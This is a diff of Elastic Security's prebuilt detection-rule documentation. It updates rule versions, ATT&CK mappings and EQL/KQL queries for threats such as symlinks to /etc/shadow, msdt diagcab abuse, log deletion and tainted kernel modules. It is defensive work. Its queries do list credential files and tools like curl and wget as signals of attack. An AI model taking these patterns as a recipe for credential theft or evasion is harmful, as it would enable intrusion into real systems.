Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -46,8 +46,8 @@ Identifies the creation of a symbolic link to a suspicious file or location. A s [source, js] ---------------------------------- -process where host.os.type == "linux" and event.action in ("exec", "exec_event") and -event.type == "start" and process.name == "ln" and +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and +event.type == "start" and process.name == "ln" and process.args in ("-s", "-sf") and ( /* suspicious files */ (process.args in ("/etc/shadow", "/etc/shadow-", "/etc/shadow~", "/etc/gshadow", "/etc/gshadow-") or diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-sysctl-file-event.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-sysctl-file-event.asciidoc index d056e6b632..a5341f279e 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-sysctl-file-event.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-sysctl-file-event.asciidoc @@ -3,7 +3,7 @@ Monitors file events on sysctl configuration files (e.g., /etc/sysctl.conf, /etc/sysctl.d/*.conf) to identify potential unauthorized access or manipulation of system-level configuration settings. Attackers may tamper with the sysctl configuration files to modify kernel parameters, potentially compromising system stability, performance, or security. -*Rule type*: eql +*Rule type*: new_terms *Rule indices*: @@ -29,7 +29,7 @@ Monitors file events on sysctl configuration files (e.g., /etc/sysctl.conf, /etc * Tactic: Discovery * Rule Type: BBR -*Version*: 3 +*Version*: 103 *Rule authors*: @@ -71,9 +71,8 @@ Add the newly installed `auditd manager` to an agent policy, and deploy the agen [source, js] ---------------------------------- -file where host.os.type == "linux" and event.action in ("opened-file", "read-file", "wrote-to-file") and -file.path : ("/etc/sysctl.conf", "/etc/sysctl.d", "/etc/sysctl.d/*") and -not process.name in ("auditbeat", "systemd-sysctl", "dpkg", "dnf", "yum", "rpm", "apt") +host.os.type:linux and event.category:file and event.action:("opened-file" or "read-file" or "wrote-to-file") and +file.path : ("/etc/sysctl.conf" or "/etc/sysctl.d" or /etc/sysctl.d/*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc index 594e9a3d8d..fada295d14 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc @@ -31,7 +31,7 @@ This rule monitors for the execution of several commonly used system commands ex * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 2 +*Version*: 103 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-termination-of-esxi-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-termination-of-esxi-process.asciidoc index 05cdd03182..e7fd8fbf76 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-termination-of-esxi-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-termination-of-esxi-process.asciidoc @@ -31,7 +31,7 @@ Identifies instances where VMware processes, such as "vmware-vmx" or "vmx," are * Tactic: Impact * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-troubleshooting-pack-cabinet-execution.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-troubleshooting-pack-cabinet-execution.asciidoc new file mode 100644 index 0000000000..e7efabfb3f --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-troubleshooting-pack-cabinet-execution.asciidoc @@ -0,0 +1,74 @@ +[[suspicious-troubleshooting-pack-cabinet-execution]] +=== Suspicious Troubleshooting Pack Cabinet Execution + +Identifies the execution of the Microsoft Diagnostic Wizard to open a diagcab file from a suspicious path and with an unusual parent process. This may indicate an attempt to execute malicious Troubleshooting Pack Cabinet files. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.action == "start" and + (process.name : "msdt.exe" or process.pe.original_file_name == "msdt.exe") and process.args : "/cab" and + process.parent.name : ( + "firefox.exe", "chrome.exe", "msedge.exe", "explorer.exe", "brave.exe", "whale.exe", "browser.exe", + "dragon.exe", "vivaldi.exe", "opera.exe", "iexplore", "firefox.exe", "waterfox.exe", "iexplore.exe", + "winrar.exe", "winrar.exe", "7zFM.exe", "outlook.exe", "winword.exe", "excel.exe" + ) and + process.args : ( + "?:\\Users\\*", + "\\\\*", + "http*", + "ftp://*" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-utility-launched-via-proxychains.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-utility-launched-via-proxychains.asciidoc index 63e446ae37..7079b3961e 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-utility-launched-via-proxychains.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-utility-launched-via-proxychains.asciidoc @@ -31,7 +31,7 @@ This rule monitors for the execution of suspicious linux tools through ProxyChai * Tactic: Command and Control * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-werfault-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-werfault-child-process.asciidoc index ef394544f7..50de714563 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-werfault-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-werfault-child-process.asciidoc @@ -35,10 +35,12 @@ A suspicious WerFault child process was detected, which may indicate an attempt * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence +* Tactic: Privilege Escalation * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -81,3 +83,27 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Image File Execution Options Injection +** ID: T1546.012 +** Reference URL: https://attack.mitre.org/techniques/T1546/012/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Image File Execution Options Injection +** ID: T1546.012 +** Reference URL: https://attack.mitre.org/techniques/T1546/012/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-which-enumeration.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-which-enumeration.asciidoc index 49443ed6dc..0a4e703874 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-which-enumeration.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-which-enumeration.asciidoc @@ -24,13 +24,13 @@ This rule monitors for the usage of the which command with an unusual amount of *Tags*: * Domain: Endpoint -* OS: Windows +* OS: Linux * Use Case: Threat Detection * Tactic: Discovery * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-host.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-host.asciidoc new file mode 100644 index 0000000000..0cc632455b --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-host.asciidoc @@ -0,0 +1,59 @@ +[[suspicious-windows-process-cluster-spawned-by-a-host]] +=== Suspicious Windows Process Cluster Spawned by a Host + +A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same host name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc new file mode 100644 index 0000000000..ddceb7e330 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc @@ -0,0 +1,61 @@ +[[suspicious-windows-process-cluster-spawned-by-a-parent-process]] +=== Suspicious Windows Process Cluster Spawned by a Parent Process + +A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same parent process name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-user.asciidoc new file mode 100644 index 0000000000..7c6d836647 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-user.asciidoc @@ -0,0 +1,61 @@ +[[suspicious-windows-process-cluster-spawned-by-a-user]] +=== Suspicious Windows Process Cluster Spawned by a User + +A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same user name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-wmic-xsl-script-execution.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-wmic-xsl-script-execution.asciidoc index c98064c9da..f1fe7111c2 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-wmic-xsl-script-execution.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-wmic-xsl-script-execution.asciidoc @@ -29,9 +29,10 @@ Identifies WMIC allowlist bypass techniques by alerting on suspicious execution * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -65,3 +66,11 @@ sequence by process.entity_id with maxspan = 2m ** Name: XSL Script Processing ** ID: T1220 ** Reference URL: https://attack.mitre.org/techniques/T1220/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-zoom-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-zoom-child-process.asciidoc index 3f1ba26333..5305137091 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-zoom-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-zoom-child-process.asciidoc @@ -30,11 +30,12 @@ A suspicious Zoom child process was detected, which may indicate an attempt to r * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -125,3 +126,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Process Injection ** ID: T1055 ** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git a/docs/detections/prebuilt-rules/rule-details/symbolic-link-to-shadow-copy-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/symbolic-link-to-shadow-copy-created.asciidoc index 26ca5c9c77..54aeccc7a0 100644 --- a/docs/detections/prebuilt-rules/rule-details/symbolic-link-to-shadow-copy-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/symbolic-link-to-shadow-copy-created.asciidoc @@ -39,7 +39,7 @@ Identifies the creation of symbolic links to a shadow copy. Symbolic links can b * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -136,3 +136,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: OS Credential Dumping ** ID: T1003 ** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Security Account Manager +** ID: T1003.002 +** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Sub-technique: +** Name: NTDS +** ID: T1003.003 +** Reference URL: https://attack.mitre.org/techniques/T1003/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc b/docs/detections/prebuilt-rules/rule-details/system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc index 7b14911285..c46c86b71a 100644 --- a/docs/detections/prebuilt-rules/rule-details/system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc @@ -29,7 +29,7 @@ This rule monitors for the copying or moving of a system binary to a suspicious * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -45,7 +45,7 @@ This rule monitors for the copying or moving of a system binary to a suspicious ---------------------------------- sequence by host.id, process.entity_id with maxspan=1s [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and - process.name in ("cp", "mv", "cat") and process.args : ( + process.name in ("cp", "mv") and process.args : ( // Shells "/bin/*sh", "/usr/bin/*sh", @@ -63,10 +63,10 @@ sequence by host.id, process.entity_id with maxspan=1s "/usr/bin/mknod", "/bin/ping*", "/usr/bin/ping*", "/bin/nmap", "/usr/bin/nmap", // System utilities - "/bin/ls", "/usr/bin/ls", "/bin/cat", "/usr/bin/cat", "/bin/mv", "/usr/bin/mv", "/bin/cp", "/usr/bin/cp", - "/bin/sudo", "/usr/bin/sudo", "/bin/curl", "/usr/bin/curl", "/bin/wget", "/usr/bin/wget", "/bin/tmux", - "/usr/bin/tmux", "/bin/screen", "/usr/bin/screen", "/bin/ssh", "/usr/bin/ssh", "/bin/ftp", "/usr/bin/ftp" - )] + "/bin/ls", "/usr/bin/ls", "/bin/cat", "/usr/bin/cat", "/bin/sudo", "/usr/bin/sudo", "/bin/curl", "/usr/bin/curl", + "/bin/wget", "/usr/bin/wget", "/bin/tmux", "/usr/bin/tmux", "/bin/screen", "/usr/bin/screen", "/bin/ssh", + "/usr/bin/ssh", "/bin/ftp", "/usr/bin/ftp" + ) and not process.parent.name in ("dracut-install", "apticron", "generate-from-dir", "platform-python")] [file where host.os.type == "linux" and event.action == "creation" and file.path : ( "/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", "/var/www/*", "/proc/*/fd/*" )] @@ -83,3 +83,11 @@ sequence by host.id, process.entity_id with maxspan=1s ** Name: Hide Artifacts ** ID: T1564 ** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/system-log-file-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/system-log-file-deletion.asciidoc index b06ba5ee6e..bb881b49f4 100644 --- a/docs/detections/prebuilt-rules/rule-details/system-log-file-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/system-log-file-deletion.asciidoc @@ -34,7 +34,7 @@ Identifies the deletion of sensitive Linux system logs. This may indicate an att * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -43,47 +43,6 @@ Identifies the deletion of sensitive Linux system logs. This may indicate an att *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. -- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query @@ -104,7 +63,7 @@ file where host.os.type == "linux" and event.type == "deletion" and "/var/log/boot.log", "/var/log/kern.log" ) and - not process.name : ("gzip") + not process.name in ("gzip", "executor", "dockerd") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/system-shells-via-services.asciidoc b/docs/detections/prebuilt-rules/rule-details/system-shells-via-services.asciidoc index 5e14d76abc..b70123c89d 100644 --- a/docs/detections/prebuilt-rules/rule-details/system-shells-via-services.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/system-shells-via-services.asciidoc @@ -30,11 +30,12 @@ Windows services typically run as SYSTEM and can be used as a privilege escalati * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -118,3 +119,19 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Windows Service ** ID: T1543.003 ** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/tainted-kernel-module-load.asciidoc b/docs/detections/prebuilt-rules/rule-details/tainted-kernel-module-load.asciidoc new file mode 100644 index 0000000000..7b8fea7c10 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/tainted-kernel-module-load.asciidoc @@ -0,0 +1,63 @@ +[[tainted-kernel-module-load]] +=== Tainted Kernel Module Load + +This rule monitors the syslog log file for messages related to instances of a tainted kernel module load. Rootkits often leverage kernel modules as their main defense evasion technique. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access. + +*Rule type*: query + +*Rule indices*: + +* logs-system.auth-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.dataset:"system.syslog" and process.name:kernel and +message:"module verification failed: signature and/or required key missing - tainting kernel" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Kernel Modules and Extensions +** ID: T1547.006 +** Reference URL: https://attack.mitre.org/techniques/T1547/006/ diff --git a/docs/detections/prebuilt-rules/rule-details/temporarily-scheduled-task-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/temporarily-scheduled-task-creation.asciidoc index 1d69f2c623..39c08b7f89 100644 --- a/docs/detections/prebuilt-rules/rule-details/temporarily-scheduled-task-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/temporarily-scheduled-task-creation.asciidoc @@ -31,8 +31,9 @@ Indicates the creation and deletion of a scheduled task within a short time inte * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -66,3 +67,15 @@ sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m ** Name: Scheduled Task ** ID: T1053.005 ** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/third-party-backup-files-deleted-via-unexpected-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/third-party-backup-files-deleted-via-unexpected-process.asciidoc index c8ef2af049..9ae157c796 100644 --- a/docs/detections/prebuilt-rules/rule-details/third-party-backup-files-deleted-via-unexpected-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/third-party-backup-files-deleted-via-unexpected-process.asciidoc @@ -36,7 +36,7 @@ Identifies the deletion of backup files, saved using third-party software, by a * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -125,3 +125,7 @@ file where host.os.type == "windows" and event.type == "deletion" and ** Name: Inhibit System Recovery ** ID: T1490 ** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc index 9cd9d36164..f7503c48cb 100644 --- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc @@ -32,10 +32,12 @@ Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -80,3 +82,27 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* 